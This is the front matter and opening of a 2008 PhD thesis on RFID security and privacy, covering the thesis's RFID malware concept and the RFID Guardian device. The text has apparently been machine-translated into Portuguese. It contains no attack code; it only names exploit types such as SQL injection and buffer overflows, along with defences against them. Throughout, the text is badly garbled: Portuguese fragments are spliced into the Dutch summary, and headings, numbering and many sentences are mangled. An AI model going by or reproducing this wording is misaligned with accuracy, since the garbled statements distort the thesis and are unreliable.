Anda di halaman 1dari 172

Segurana e privacidade dos RADIO IDENTIFICAO DE FREQNCIA

MELANIE R. R IEBACK

Este trabalho foi realizado na escola de ps-graduao ASCI. ASCI nmero de srie dissertao 166.

Comisso de doutorado: Prof.Dr. Andrew S. Tanenbaum (promotor) dr. Bruno Crispo (copromotor) Prof.Dr. Gildas Avoine (UC Louvain) Prof.Dr. Frances Brazier MT (Vrije Universiteit, Amsterdam) dr. Ari Juels (RSA Security) prof.dr.ir. Vincent Rijmen (KU Leuven / TU Graz) Prof.Dr. Sanjay Sarma E. (MIT)

Partes do captulo 1 foram publicados em IEEE Security and Privacy. Partes dos captulos 2 e 3 foram publicados em IEEE Pervasive Computing, o 3 Conferncia sobre Segurana e Proteco de Dados, eo livro Crimeloua (Addison-Wesley). Partes do captulo 4 foram publicados no 4 Conferncia Internacional IEEEcia em Pervasive Computing e Comunicaes eo Elsevier Pervasive Jornal e Computao Mvel. Partes dos captulos 5 e 6 foram publicados na 20 USENIX / SAGE Grande Instalao Conferncia Administrao do Sistema. Partes dos captulos 7 e 8 foram publicados na Australasian 10 Conferreferncia sobre Segurana da Informao e Privacidade eo Workshop Internacional 13 sobre os Protocolos de Segurana.

VRIJE UNIVERSITEIT

SEGURANA E PRIVACIDADE DE FREQUNCIA DE RDIO IDENTIFICAO

Academisch PROEFSCHRIFT

ter verkrijging van de graad Doctor aan de Vrije Universiteit Amsterdam, gezag op van de reitor magnificus Prof.Dr. L. M. Bouter, em het Openbaar te verdedigen ten overstaan van de promotiecommissie van der de faculteit exacte Wetenschappen op donderdag 11 de setembro de 2008 om 13,45 uur na aula de van de Universiteit, De Boelelaan 1105

porta

Melanie Rose Rieback


geboren te Cleveland, Ohio, Verenigde Staten

promotoren:

Prof.Dr. A.S. Tanenbaum dr. B. Crispo

CIP-DATA KONINKLIJKE Bibliotheek, DEN HAAG

Rieback, Melanie Rose Segurana e privacidade de Radio Frequency Identification Melanie Rose Rieback. Amsterdam: Vrije Universiteit Thesis Vrije Universiteit. - Com ndice ref,. - Resumo Com em neerlands ISBN / EAN: 978-90-5335-162-8 Cabealhos de assunto: segurana, privacidade, Radio Frequency Identification, RFID malware, RFID Guardio

Correspondncia: melanie@cs.vu.nl

Copyright c 2008 por MR Rieback, Amsterdam, Holanda Todos os direitos reservados. Nenhuma parte desta publicao pode ser reproduzida, armazenada em um sistema de qualquer natureza, ou transmitida por qualquer forma ou por qualquer meio, eletrnico, meccal, atualmente conhecida ou futuramente inventado, incluindo fotocpia ou gravao, sem prvia permisso por escrito do autor.

Impresso nos Pases Baixos

Para Bess, Fay, e Stan

CONTEDO

AGRADECIMENTOS Samenvatting 1 INTRODUO 1.1 Motivao para o Trabalho. . Contribuies 1,2. . . . . . . . 1.2.1 Acadmico. . . . . . 1.2.2 Impacto do mundo real. 1.3 Estrutura da Dissertao

1 3 7 8 9 9 9 14

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

2 Radio Frequency Identification 2.1 Introduo ao RFID. . . . . . . . . . 2.1.1 Perspectiva Histrica. . . . . 2.1.2 Etiquetas RFID / leitores. . . . . . . 2.1.3 Infra-estrutura RFID. . . . . . . 2,2 aplicaes RFID. . . . . . . . . . . 2.3 A Indstria de RFID. . . . . . . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

17 17 18 18 19 19 22

3 RFID SEGURANA E PRIVACIDADE 3.1 Introduo RFID Segurana / Privacidade 3.1.1 Perspectiva Histrica. . . . 3.2 Modelo atacante. . . . . . . . . . . . 3.2.1 Tipos de atacante. . . . . . . . 3.2.2 Motivos atacante. . . . . . . 3,3 Low-Level Ataques. . . . . . . . . . 3.3.1 Sniffing. . . . . . . . . . . . 3.3.2 Rastreamento. . . . . . . . . . . Spoofing 3.3.3. . . . . . . . . . . 3.3.4 ataques de repetio. . . . . . . . 3.3.5 Negao de Servio. . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

23 23 23 25 25 26 30 30 30 31 31 31

CONTEDO 3,4 Contramedidas RFID. . . . . . 3.4.1 Perspectiva Histrica. . 3.4.2 Controles Tecnolgico. . 3.4.3 Procedural-Level Controls 3.4.4 Poltica Level-Controls. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 32 33 34 35

4 MALWARE RFID 4,1 factores que favorecem o Malware RFID. . . 4.2 Viso Geral Malware RFID. . . . . . . . . 4.3 A concepo de RFID Princpios Malware. . . . . 4.3.1 RFID Middleware Architecture . 4.3.2 Exploits RFID. . . . . . . . . . 4.3.3 Worms RFID. . . . . . . . . . . 4.3.4 Vrus RFID. . . . . . . . . . . 4.4 Exemplo detalhado: Oracle / SSI Virus. . . 4.4.1 Arquitetura de Back-End. . . . . . 4.4.2 O Virus. . . . . . . . . . . . . 4.4.3 Infeco Banco de Dados. . . . . . . . 4.4.4 Ativao Payload. . . . . . . . 4.4.5 Infeco de novas tags. . . . . . 4,5 Discusso. . . . . . . . . . . . . . . . . 4.5.1 Consideraes Space. . . . . . . 4,6 Contramedidas. . . . . . . . . . . . . 4,7 Implicaes. . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

. . . . . . . . . . . . . . . . .

41 41 42 44 44 45 49 50 54 55 56 56 57 57 58 59 60 61

5 RFID GUARDIAN: Viso Geral da Plataforma Viso geral 5,1 RFID Guardian. . . . . . . . . . 5.1.1 Objetivos de Design. . . . . . . . . . . . 5,2 Viso geral de hardware. . . . . . . . . . . . . 5.2.1 Arquitetura de Hardware. . . . . . . 5.2.2 Viso geral de Design RF. . . . . . . . 5,3 Viso geral do software. . . . . . . . . . . . . 5.3.1 Organizao de Alto Nvel. . . . . . 5.3.2 Abstraes detalhadas. . . . . . . . 5.3.3 Side Console. . . . . . . . . . . . 5.3.4 RFID Side Guardian. . . . . . . . 5,4 Interfaces do Usurio. . . . . . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

. . . . . . . . . . .

63 63 63 65 65 69 69 70 72 72 73 76

CONTEDO

XI

6 RFID GUARDIAN: operaes primitivas 6,1 Spoofing Tag RFID. . . . . . . . . . . . . . . 6,2 Jamming RFID seletiva. . . . . . . . . . . . 6.2.1 RFID Tag Jamming Response. . . . . 6.2.2 RFID Jamming Consulta Reader. . . . . 6,3 Protocol Guardian. . . . . . . . . . . . . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

. . . . .

79 79 82 82 87 89

7 FERRAMENTAS PARA RFID PRIVACIDADE 7,1 Auditoria. . . . . . . . . . . . . . . . 7.1.1 Digitalizao Logging. . . . . . . . . 7.1.2 Logging Tag. . . . . . . . . 7,2 Gerenciamento de Chaves. . . . . . . . . . . 7,3 Controle de Acesso. . . . . . . . . . . . 7.3.1 conceitos de alto nvel. . . . . 7.3.2 Implementao. . . . . . . . 7.3.3 Exemplo Poltica ACL. . . . . 7,4 autenticao. . . . . . . . . . . . . 7.4.1 Infra-estrutura de back-end . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

91 91 92 92 93 94 94 96 96 99 100

8 FERRAMENTAS PARA SEGURANA RFID 8,1 Diagnstico e Monitoramento. . . . . . . 8.1.1 Auditoria de Trfego RFID. . . . . . 8.1.2 Deteco de Intruso RFID. . . . 8,2 manipulao de pacotes. . . . . . . . . . . 8.2.1 RFID Spoofing / Jamming. . . . . 8.2.2 Repetio RFID / Relay ataques. . . 8.2.3 Man-in-the-Middle RFID. . . . . 8,3 Teste de Invaso. . . . . . . . . . . . 8.3.1 Fuzzing RFID. . . . . . . . . . 8.3.2 RFID Anlise Diferencial Energia

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

. . . . . . . . . .

103 103 104 105 105 106 106 106 107 107 108

9 DISCUSSO 9,1 ataques contra o Guardian RFID 9.1.1 Negao de Servio. . . . . . 9.1.2 Problema da Estao Oculta. . 9.1.3 Etiquetas incompatveis. . . . . 9.1.4 Anlise de Sinais Diferenciais 9,2 Questes Legais. . . . . . . . . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

111 111 111 112 113 113 113

XII

CONTEDO

10 TRABALHOS RELACIONADOS 10,1 Atacar RFID. . . . . . . . . . . . . . . . 10.1.1 Skimming RFID. . . . . . . . . . . 10.1.2 RFID de manipulao de dados. . . . . . . 10.1.3 Tag Spoofing / Repetio ataques. . . . 10.1.4 Rel Ataques RFID. . . . . . . . . 10.1.5 Side Channel-ataques. . . . . . . . . 10,2 Proteger RFID. . . . . . . . . . . . . . . . 10.2.1 Desativao Tag RFID. . . . . . . . 10.2.2 Leve Primitives Cryptographic 10.2.3 protocolos de autenticao. . . . . . . 10.2.4 Distncia Bounding protocolos. . . . . 10.2.5 Controle de Acesso On-Tag. . . . . . . . 10.2.6 Controle de Acesso Off-Tag. . . . . . . 10,3 Comparao com RFID Guardian. . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

115 115 115 118 120 123 124 124 125 126 127 127 128 128 129

11 SNTESE E CONCLUSES 11,1 Resumo desta tese. . . . . . . . . . . . . . . . . . . . . . . 11,2 Trabalhos Futuros. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11,3 Lies Aprendidas. . . . . . . . . . . . . . . . . . . . . . . . . . BIBLIOGRAFIA INDEX CURRICULUM VITAE

131 131 132 132 133 145 149

LIST DE FIGURES
1,1 1,2 2,1 2,2 2,3 Google Trends: RFID. . . . . . . . . . . . . . . . . . . . . . . . Depondo no Parlamento holands. . . . . . . . . . . . . . . . . 11 13

Philips I. Cdigo Tag RFID. . . . . . . . . . . . . . . . . . . . . . 17 RFID Arquitetura: Rede EPC. . . . . . . . . . . . . . . . . 20 Injeo de uma vaca com um Transponder RFID - Identronix Research, 1978. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 Disperso Chaff de um avio na Segunda Guerra Mundial. . . . . . . . . .24 .. RFID Plataforma de Testes Malware. . . . . . . . . . . . . . . . . . . . A Primeira-Virally Infected Tag RFID. . . . . . . . . . . . The Guardian RFID (V3-RevB). . RFID Guardian: HW Arquitetura . Backplane e os Quadros de Baby. . .. "Tag" Funcionalidade Task. . . . . . RFID Guardio Layers SW. . . . . User Interface RFID Guardian. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 55 64 65 67 71 73 77

3,1 4,1 4,2 5,1 5,2 5,3 5,4 5,5 5,6

6,1 6,2 6,3 6,4 6,5 6,6 6,7 6,8 6,9

Sinal Tag RFID normais. . . . . . . . . . . . . . . . . . . . . . 80 Sinal falsificado Tag RFID. . . . . . . . . . . . . . . . . . . . . . 81 Etiquetas RFID Spoofing Mltiplas. . . . . . . . . . . . . . . . . . . . 82 Seletivamente Tag Jamming # 2. . . . . . . . . . . . . . . . . . . . 83 Screenshot Durante Consulta ininterrupta. . . . . . . . . . . . . . 84 Screenshot Durante Jamming RFID seletiva. . . . . . . . . . . . 85 Restries de tempo. . . . . . . . . . . . . . . . . . . . . . . . . 86 Tamanho mximo de ACL que podem ser processados em uma velocidade 88 CPU Dado 89 Tempo de RFID Jamming Query. . . . . . . . . . . . . . . . . . RFID Fuzzing: uma ilustrao passo a passo. . . . . . . . . . . . 109

8,1

10,1 RFID Sniffer. . . . . . . . . . . . . . . . . . . . . . . . . . . . 116

XIV

LIST DE FIGURES

10,2 Antenas Skimming Grande RFID . . 10,3 Nike + Sniffer. . . . . . . . . . . . 10,4 OpenPCD. . . . . . . . . . . . . . 10,5 RFDump: Screenshot. . . . . . . . 10,6 ProxMark III. . . . . . . . . . . . 10,7 Cloner Verichip. . . . . . . . . . . 10,8 OpenPICC. . . . . . . . . . . . . . 10,9 Emulator Carto de Crdito PICCAL. . . 10.10Ghost e Leech. . . . . . . . . . Dispositivos Rel 10.11Gerhard Hancke .de . Zapper 10.12RFID. . . . . . . . . . . . 10.13Clipped RFID Tag. . . . . . . . . . 10.14RFID Wallet Anti-Skimming. . . . Tag Blocker 10.15RSA. . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

. . . . . . . . . . . . . .

116 117 118 120 120 121 121 122 123 124 125 126 126 129

LIST DE TABLES
3,1 4,1 4,2 4,3 4,4 4,5 Ferramentas RFID Tecnolgico. . . . . . . . . . . . . . . . . . . . . RFID de estouro de buffer: Insero de cdigo personalizado por um Overflowing 256 Tampo Byte. . . . . . . . . . . . . . . . . . . . . . . . . . . NewContainerContents Table. . . . . . . . . . . . . . . . . . . . ContainerContents Table. . . . . . . . . . . . . . . . . . . . . . ContainerContents Tabela infectados. . . . . . . . . . . . . . . . . Resumo de ataques contra RFID Middleware. . . . . . . . . . 39

48 50 56 57 58

10,1 RFID Tag emuladores para Segurana / Privacidade. . . . . . . . . . . . . 129

AGRADECIMENTOS
Minha experincia ps-graduao tem sido uma aventura. Eu esperava uma abundana de leitura, escrita, e um tempo sozinho na frente do computador - mas os quatro anos de meu doutorado atravessa-me no meio de um turbilho de Segurana RFID que era mais louco e scio-poltico do que eu poderia ter imaginado. Muito disso devido ao meu Ph.D. conselheiro Andrew Tanenbaum, que ajudou a transformar "Ainda em outro estudo de pesquisa" em um turno surreal de eventos. Um especialista na aplicao de habilidades tcnicas para interesses divergentes, Andy a personificao de como se pode pull off (quase) nada por teimosamente a aplicao de um mix de paixo, engenheiros reducionismo, transtorno obsessivo foco a construo da comunidade, conhecimento tecnolgico, e uma senso de humor. Eu tenho a sorte de inexpressably t-lo como um mentor. Andy tambm forneceu-me com muito mais apoio (tempo / energia / intelecto / financiamento) do que eu jamais poderia ter solicitado com uma boa conscincia. Tambm tenho uma grande dvida de gratido para com Rutger Hofman (o RFID levar Guardio SW desenvolvedor) e Serge Keijser (a liderana RFID Guardio HW desenoper). Sem a sua energia e capacidade tcnica, este projecto nunca teria ido em qualquer lugar! Tambm sou grato a Georgi Gaydadjiev da TU Delft ele tinha f em mim quando me aproximei dele h 3 anos, e ele tem generosamente desde um fluxo constante de CE / EE apoio desde ento. O RFID Projeto Guardio teve contribuintes incrvel e amigos durante ltimos anos. Quero agradecer: Bruno Crispo, Patrick Simpson, Frances BraZier, Katerina Mitrokotsa, Jedediah Dietrich, Vincent Osinga, Hongliang Wang, Charalampos Zois, Narasimha Raghavan, Nicholas Tittley, Jurgen Chung, Sven Gude, Peter Peerdeman, Antoine Talen, Janes Smitskamp, Rik Kaspersen, Rolf Streefkerk, Jelle van Etten, Chen Zhang (VU), Edmond Balidemic, Iliass BanNouh, Michael Gonen, Mark van Schie, Tim Velzeboer, Sebastiaan Voorderhaake, Edwin Wiek, Dimitris Stafylarakis, o falecido Stamatis Vassiliadis (TU Delft), Bas Wensveen, Rien Homs (Inholland Hogeschool), John Sinteur (Dubbele.com), Yoav Naveh, Noam Rathuis, Aviram Jenik, e Gadi Evron (Beyond Security), Job de Haas, Mark Witteman, Fred de Beer, Dennis Vermoen e Harko Robroch (Riscure), Andrew Richardson, Peter Honeyman (Univ. of Michigan), Rop Gonggrijp, Fabienne Serriere (Cryptophone), Bert Vlaanderen (V & V Design), Nigel

AGRADECIMENTOS

CHAP. 0

Wagstaff, Ward Mosmuller (VU Escritrio de Transferncia de Tecnologia), Anton Tombeur e Eduard Stikvoort (Philips Research), Gildas Avoine (UC Louvain), Ari Juels (RSA Security), Vincent Rijmen (TU Graz), Sanjay Sarma (MIT Auto-ID Center), Rob van Kranenburg (Waag Society), Peter Eckersley (Electronic Frontier Foundation), e Cory Doctorow (UCSD). Finalmente, graas NWO (holands Science Foundation), KNAW (holands Royal Academy of Science), e para NLnet seu passado e manuteno do apoio financeiro do projeto Guardio RFID. Este Ph.D. dissertao dedicado a (a memria de) meus avs: Bess Weiner, e Fay e Feller Stanley. Eu tambm sou obrigado a reconhecer meus pais, Eileen e David Rieback - minha me me fez um tipo-A-indepen teimosamente dent nerd (quando necessrio), e meu pai me fez um tipo B-slacker goofball (O resto do tempo) - a mistura tem funcionado bem para mim. Gostaria tambm de enviar os meus melhores votos e amor para Ellen e Rieback Michelle, Sheila Painter, Evan, Eric, e Ross Margelefsky, Anita Axelrod, Jim e Iris Shur, Shayndelynne Zeldin, e Ray Sinukoff. Eu tambm devo muito aos meus amigos. Sou grato a Butter Ren 'para seu supporte todo muitos perodos crticos durante meu doutorado Obrigado tambm ao meu divertimento-loving VU colegas de trabalho, passado e presente, (Elth, Philip, Jan-Mark, Ben, Jorrit, Mischa, Bogdan, Swami, Guido, Niels, Ana, Daniela, Paolo, Nate, David). Tambm graas aos meus amigos, locais e no exterior (Sarah Kraynick, Christine Fischer, Bram Visser, Ben Rosner, Laurie Dinnerstein, David Marcus, Tommy Walsh, Eddie SilVerman, Mike Gerson). Um grito para fora para alguns dos geeks de computador incrvel que Eu conheci durante minhas viagens (Alder Raven, Lee Damon, Tom Limoncelli, Richard Lindberg), e muito amor para o Jantar de Garota Geek, Meetin Amsterdam, e Knights of the Torradeira para a prestao de divertido distraes em Amesterdo. E por ltimo, mas no unimportantly, graas a Steve Runner e Tinkoff Adam para a produo de podcasts incrvel que alimentaram meu vcio em execuo!

SAMENVATTING

Beveiliging en Privacidade van Rdio Frequentie Identificatie


Identificao por Rdio Freqncia (RFID) zijn op een computerchips morrer afestar van energie (STROOM) voorzien porta worden hun uitleesapparaten. Tags RFID worden beschouwd als de opvolger van de cdigo de barras. Z bieden bieden draadloze identificatie, en een beloven revolutie em industri le, le commerci en medischeee toepassingen. RFID Tag bieden een gemakkelijke Manier informatie om mais de fysieke objecten te verzamelen. Het voordeel etiquetas RFID van dat zij informatie mais Meerdere kunnen bevatten objecten en een van dat zij afstand porta-en fysie ke barri `res uitgelezen kunnen worden. Binnen de "ubiquitous computing" visiee van Mark Weiser kunnen etiquetas RFID onze interacties conheceu computinginfrastructuur uitgroeien tot iets onbewusts en fantastisch. Chips RFID em het zijn algemeen net zo groot als een korreltje rijst, en zij hebben ingebouwde logica en een frontend analoog. Passieve (en semi-actieve) Tags RFID worden volledig gevoed porta middel van energie morrer ze krijgen van hun RFID lezers, en daarentegen gebruiken actieve etiquetas batterijen waardoor zij een groter bereik hebben. Baixa freqncia (LF) tags (125-135 kHz) zijn uitleesbaar tot 30 cm, de alta freqncia (HF) tags (13,56 MHz) tot 1 metro, ultra alta freqncia (UHF) tags (860-960 MHz en 2,45 GHz) tot 7 metros, tags en actieve tot de 100 metros de meer. RFID Tag worden gepresenteerd als een technologie om kosten te besparen porta effici van het ntie Zaken doen te verhogen, om em transparantie de logistieke te verbeteren, en om generalizado de computao incorporados te implementeren. Met Tags RFID vervagen dus de Grenzen tussen de online-en Wereld de fysieke Wereld. Daardoor maakt RFID een nieuwe tal van toepassingen mogelijk Binnen toegangsBeheer, Automatisering van de detailhandel, (slimme) huizen en kantoren, en het opsporen van mens en Dier.

SAMENVATTING

CHAP. 0

PROBLEEMSTELLING
Ondanks de talloze voordelen, heeft RFID ook een duistere kant. Dezelfde gebruikersvriendelijkheid en beschikbaarheid morrer RFID zo revolutionair maakt geeft minder ethische mensen ongekende mogelijkheden tot diefstal, geheime opspogedragsprofilering anel de en. Zonder afdoende toegangsbeheer kunnen aanvallers ongehinderd etiquetas RFID lezen, en daardoor de locatie van mensen objecten de serspioneren, etiquetas RFID klonen, dados van RFID Tag wijzigen, de de Communicatie tussen RFID tags e RFID lezers verstoren. Er een Manier nodig etiquetas RFID om (zelfs de allergoedkoopste) em gaten de te houden en tegen misbruik te beschermen. Om de privacidade te beschermen het nodig om op een gebruikersvriendelijke Manier om de RFID beveiligingsfunctionaliteit te coordineren, porta nauwkeurige Uitvoering auditorias van sleutelmanagement, toegangsbeheer, en authenticatie atravs de RFID interface. RFID installaties moeten aan mo de van beveiligingsaudits penetratie entesten beoordeeld worden andere net computersystemen zoals. Organisaties morrer RFID systemen ingebruik nemen hebben de verantwoordelijkheid om de beveiliging van hun installaties op de proef te stellen, maar niet zij weten vaak hoe ze dit moeten doen. Dit iets wat de computerbeveiligingsindustrie wel op wil pakken, maar veel beveiligingsexperts hebben een gebrek aan de geschikte testapparatuur voor RFID systemen. Het Belang van dus dat dergelijke testapparatuur ontwikKeld wordt en beschikbaar komt voor beveiligingsexperts (en op het ontwikkelaars Gebied van RFID).

BIJDRAGEN
Em dit introduceer ik het proefschrift conceito "malware RFID" en beschrijf ik het ontwerp, implementatie, en evaluatie van de "RFID Guardian", het eerste ge ntegreerde plataforma RFID voor beveiliging en privacybeheer.

RFID Malware
Em dit proefschrift beschrijf ik het van conceito RFID malware, em bijzonder het RFID exploits, RFID wormen en RFID virussen. RFID systemen hebben een aantal aspecten morrer ze kwetsbaar en aantrekkelijk voor aanvallers maken: veel en complexe broncode, het van gebruik standaardprotocollen en en technologie, het gebruik van het databasen en aanwezigheid dados van waardevolle. Exploits RFID zijn enkelgebruik aanvallen waarbij kwaadaardige dados op RFID Tag gebruikt wordt om achterliggende software componenten aan te vallen. RFID exploits misbruiken dus specifieke systeemcomponenten zoals bases de dados, webin-

SCE . 0,0

SAMENVATTING

terfaces, en porta Gluecode middel van bekende aanvallen zoals-buffer overflows, cdigo de insero, en-SQL injectie. Kort samengevat, lanceren RFID exploits standaard "hack aanvallen", zoals overal te vinden op het zijn Internet, goedkope porta, passieve etiquetas RFID en contactloze kaarten, da porta apparaten etiquetas RFID morrer emuLeren. Een verme RFID zichzelf voortplantende cdigo dat netwerkverbindingen gebruikt om zichzelf te propageren naar databasen en nieuwe tags RFID. Wormen hebben vaak een zogenaamde "payload", morrem verwoestingen aanricht zoals het wissen van bestanden, informatie stiekem versturen via e-mail de het installeren van "backdoors". Een vrus RFID um cdigo morrer zichzelf kan voortplanten Zonder de aanwezigheid van een netwerkverbinding; tags RFID zijn voldoende om RFID virusaanvallen te verspreiden. RFID virussen gebruiken RFID exploits om achterliggende RFID systemen te modificeren op een zodanige Manier dat de dados van nieuwe RFID Tag worden voorzien van het van de cdigo de vrus de RFID. Zelfreferentie le com-e Quines mando de en zijn twee manieren om de volledige aanvalscode naar de juiste databaselocatie te schrijven. Ook RFID virussen kunnen voorzien worden van een payload schadelijke. Systeembeheerders en ontwikkelaars van middleware RFID kunnen aanvallen op RFID systemen porta afweren gebruik te maken van de volgende technieken: limites controlo, het van opschonen invoer, het van uitzetten script-interpretors, het van beperken permissies, het van scheiden gebruikers, het binden van parametros, isolatie van de middleware servidor, en het voldoende reviewen van RFID middleware broncode.

RFID Guardio
De RFID Guardian een mobiel, batterij-gevoed apparaat dat "bemiddeld" em interacties tussen RFID lezers en tags RFID. Te Bescherming van de privacidade biedt de RFID Guardio een "RFID firewall". De huidige RFID contramedidas implementeren vaak hun beveiligingspolicies op de tags RFID; dit maakt de polticas echter moeilijk te configureren en te gebruiken. Om d'Eze situatie te verbeteren, wij hebben een RFID lezer conheceu tag RFID emulatie gecombineerd em een plataforma dat de onderlinge coordinatie van RFID contramedidas mogelijk maakt. Individuele beveiligingspolicies worden dan afgedwongen porta de unieke functies van de RFID Guardian (auditoria, automatisch sleutelbeheer, bemiddeling tussen RFID tags de RFID en lezers, off-tag a aucao) samen conheceu bestaande beveiligingstechnieken RFID (kill-comando, o slaap / waak modos, on-tag cryptografie). Andere doelstellingen van de RFID GuArdian zijn: gedrag dat afhankelijk van de contexto, gebruikersvriendelijkheid, en toepasbaarheid no de "echte Wereld".

SAMENVATTING

CHAP. 0

De RFID Guardian ontworpen als een van soort "zwitsers zakmes" voor RFID beveiliging, reuniu-se daarin een ge ntegreerd pakket van beveiligingstesten: dia- gnostiek en monitoren, manipulatie en filteren van RFID pakketten, penetratietesten en-side channel aanvallen. Toolkit Zo'n voor het essentieel fatsoenlijk testen van de aanvalsbestendigheid van RFID systemen, waardoor eigenaren van RFID systemen goed onderbouwde afwegingen kunnen maken tussen beveiliging en gebruiksgemak voor een toepassing bepaalde. Ns hebben de RFID Guardio gebouwd conheceu behulp van standaardcomponendez, onze en ervaringen bevestigen dat actieve, Celular apparaten zijn nuttig voor het van beveiligen tags RFID em verschillende toepassingen, inclusief de bescherTag ming van goedkope morrer zichzelf anders niet kunnen beschermen.

CCAPTULO 1

Introduo
Este Ph.D. dissertao aborda a questo fundamental: "Como voc segura o computador encolhendo? ". Nos velhos tempos (circa 1970), os computadores eram desembaraadas e livres. Alguns podem se lembrar de um jovem chamado upstart Richard Stallman que se recusou a proteger com senha sua conta de usurio MIT Media Lab por razes ideolgicas. Sua raciocnio era simples - quem iria querer um tal abuso teis e maravilhosas nova tecnologia? Deixe que o acesso seja livre! Muita coisa mudou desde ento. Vrus de computador agora fazer manchetes regular, Segurana na Internet um negcio florescente. Mesmo cabeleireiro da esquina ter todo o prazer rant sobre os perigos da Internet banking. No entanto, como os computadores ficam menores e mais difundida, a sua segurana e privacidade tornam-se menos bem compreendidos. Ao longo dos ltimas dcadas, o computador tem vindo a diminuir, sala de tamanho principalquadros e minicomputadores evoluiu para uma forma que se encaixa confortavelmente em uma mesa ou uma colo. Computadores foram embarcados em objetos comuns, como carros, trficofic luzes, aparelhos de som, fornos de microondas e relgios de pulso, e em algum momento, esses computadores atingidos rede sem fio. Pesquisadores, ento, decidiu construir mesmo computadores cada vez menores, que esto equipados no s com as comunicaes sem fio, mas com "energia sem fio." Esses computadores milmetros escala ficou conhecida como Radio Frequency Identification (RFID) chips, e eles so agora usados em todos os tipos de aplicaes. Mas a questo fundamental permanece: como que voc segura o menor e o mais fraco dos computadores? Como algum computadores seguros que no podem realizar criptografia? E o que acontece com os computadores que so to limitados que o poder eles no podem mais controlar o seu prprio acesso? Como ilustrado desde 1970, ingnuo idealismo no suficiente. Este Ph.D. dissertao explora as questes de segurana e privacidade da Rdio Frecia de tecnologia de identificao. A primeira parte da minha tese expe a

EuNTRODUO

CHAP. 1

segurana e privacidade ameaas que enfrenta RFID, ea segunda parte prope uma soluo que eu chamo o Guardian RFID.

1.1. Motivao para este trabalho


Radio Frequency Identification (RFID) so alimentados remotamente computador chips que aumentam objetos do cotidiano com recursos de computao. Ex-corporativo ecutives tout tecnologia RFID como um meio tecnolgico para alcanar economia de custos, ganhos de eficincia e visibilidade sem precedentes na cadeia de abastecimento. Recientfica pesquisadores consideram a tecnologia RFID como nada menos que a personificao do mudana de paradigma no sentido de baixo custo de computao ubqua. Em ambos os casos, as tags RFID vai esbater as fronteiras entre os mundos digital e fsico. Automao RFID vai trazer uma enxurrada de novas aplicaes insondvel. Proponentes RFID exaltar seus usos profissionais em tempo real de gesto de ativos e supply chain management. RFID acesso baseado em passes ajudar a polcia residenciais, fronteiras comerciais, e nacional; motoristas adotaram RFID de pagamento com base sistemas como o EZ-Pass, FastPass, iPass, PayPass, e SpeedPass. RFID baseado em sentir " boas "aplicaes pessoais tambm esto proliferando, de lavadoras automticas, de "coelhos inteligentes" [115]. No entanto, essa utopia de computao pervasiva tambm tem seu lado escuro. Semelhante ao outras tecnologias de computao generalizada (reconhecimento, por exemplo, facial, telefones celulares), a facilidade de uso mesmo e difuso que faz com que a tecnologia RFID para revoluprecauo oferece menos-then-tica caracteres oportunidades sem precedentes para o roubo, rastreamento secreto, e perfil 